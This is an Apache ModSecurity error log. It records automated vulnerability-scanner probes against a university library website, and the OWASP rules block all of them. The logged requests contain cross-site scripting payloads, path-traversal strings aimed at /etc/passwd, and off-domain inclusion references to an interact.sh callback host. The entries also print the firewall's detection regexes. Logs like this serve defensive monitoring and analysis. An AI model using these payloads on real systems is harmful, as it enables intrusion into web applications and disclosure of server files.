[Tue Aug 29 11:52:37.557319 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:expires_in. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:expires_in: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15lcCo-f0AAAoT7NUAAAAD"]
[Tue Aug 29 11:52:37.615695 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileid: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15lcCo-f0AAAoQ3KMAAAAN"]
[Tue Aug 29 11:52:37.615758 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DOC. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:DOC: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wgarcmin.cgi"] [unique_id "ZO15lcCo-f0AAAoGFZUAAAAE"]
[Tue Aug 29 11:52:40.655341 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:out. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:out: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/client/manage/ourphp_out.php"] [unique_id "ZO15mMCo-f0AAAoO51cAAAAK"]
[Tue Aug 29 11:52:40.655605 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com<Svg/onload=alert(document.domain)> found within TX:1: google.com<Svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/fmlurlsvc/"] [unique_id "ZO15mMCo-f0AAAoUJbwAAAAB"]
[Tue Aug 29 11:52:41.696212 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15mcCo-f0AAAoPuXYAAAAM"]
[Tue Aug 29 11:52:42.555687 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../../../../../ found within ARGS:controller: =../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAoT7OsAAAAD"]
[Tue Aug 29 11:52:42.631385 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debug_host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:debug_host: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAoLfJYAAAAG"]
[Tue Aug 29 11:52:44.764565 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0HkQR8I3XhDLhgGNgSJ5LNGO)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15nMCo-f0AAAoO524AAAAK"]
[Tue Aug 29 11:52:45.604533 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:extra. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:extra: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/mj_wwwusr"] [unique_id "ZO15ncCo-f0AAAlUlwMAAAA0"]
[Tue Aug 29 11:52:46.838540 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/openwin.php"] [unique_id "ZO15nsCo-f0AAAoW7IoAAAAJ"]
[Tue Aug 29 11:52:46.879132 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:redirect_to: /asdf\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/demo/api/logout"] [unique_id "ZO15nsCo-f0AAAlUlwsAAAA0"]
[Tue Aug 29 11:52:47.615392 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/user/login/"] [unique_id "ZO15n8Co-f0AAAoVqo0AAAAH"]
[Tue Aug 29 11:52:47.709689 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../..//../../ found within ARGS:dir: ../../..//../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15n8Co-f0AAAoVqpEAAAAH"]
[Tue Aug 29 11:52:48.785122 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/user/logout"] [unique_id "ZO15oMCo-f0AAAoO54oAAAAK"]
[Tue Aug 29 11:52:49.553487 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:f: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/learn/cubemail/filemanagement.php"] [unique_id "ZO15ocCo-f0AAAmQ-3YAAAAb"]
[Tue Aug 29 11:52:49.622010 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:u. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:u: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/tweb/ft.php"] [unique_id "ZO15ocCo-f0AAAoPuZoAAAAM"]
[Tue Aug 29 11:52:49.655820 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:m. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:m: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/anti-plagiarism/js.php"] [unique_id "ZO15ocCo-f0AAAoVqp0AAAAH"]
[Tue Aug 29 11:52:50.808721 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/user/register"] [unique_id "ZO15osCo-f0AAAoGFcAAAAAE"]
[Tue Aug 29 11:52:52.034714 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1'<script found within ARGS:id: 1'<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO15pMCo-f0AAAlUlxsAAAA0"]
[Tue Aug 29 11:52:52.107311 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/user/resend-activation"] [unique_id "ZO15pMCo-f0AAAnTlWcAAAAA"]
[Tue Aug 29 11:52:52.621448 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:loginMode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:loginMode: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "perpustakaan.unla.ac.id"] [uri "/MicroStrategyLibrary/auth/ui/loginPage"] [unique_id "ZO15pMCo-f0AAAnd3OIAAAAI"]
[Tue Aug 29 11:52:52.847668 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://? found within ARGS:redirect_to: http://?1</sCripT><sCripT>alert(document.domain)</sCripT>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15pMCo-f0AAAnHQqMAAAAT"]
[Tue Aug 29 11:52:52.867183 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:mes: </script>\\x22><script>alert(123)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php"] [unique_id "ZO15pMCo-f0AAAnd3OkAAAAI"]
[Tue Aug 29 11:52:55.770355 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15p8Co-f0AAAoQ3OIAAAAN"]
[Tue Aug 29 11:52:55.861666 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:rsd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:rsd: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO15p8Co-f0AAAoZ6QIAAAAK"]
[Tue Aug 29 11:52:56.030776 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:")',10000000);alert(1337);setTimeout('alert(". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22)',10000000);alert(1337);setTimeout('alert(\\x22: \\x22)',10000000);alert(1337);setTimeout('alert(\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/www/delivery/afr.php"] [unique_id "ZO15qMCo-f0AAAoZ6QYAAAAK"]
[Tue Aug 29 11:52:58.596846 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:data[performredirect]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:data[performredirect]: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO15qsCo-f0AAAhoHUwAAAAl"]
[Tue Aug 29 11:52:59.203396 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:file: '>\\x22<svg/onload=confirm('test')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/diffResult.php"] [unique_id "ZO15q8Co-f0AAAhoHVMAAAAl"]
[Tue Aug 29 11:53:00.702719 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22()&%< found within ARGS:language: language'\\x22()&%<yes></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/clansphere/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15rMCo-f0AAAoAkvkAAAAC"]
[Tue Aug 29 11:53:00.716010 2023] [:error] [pid 2593] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:passformname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:passformname: \\x22><script>alert(1514407383);</script><script>/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/plugins/vkeyboard/vkeyboard.php"] [unique_id "ZO15rMCo-f0AAAohZ5UAAAAZ"]
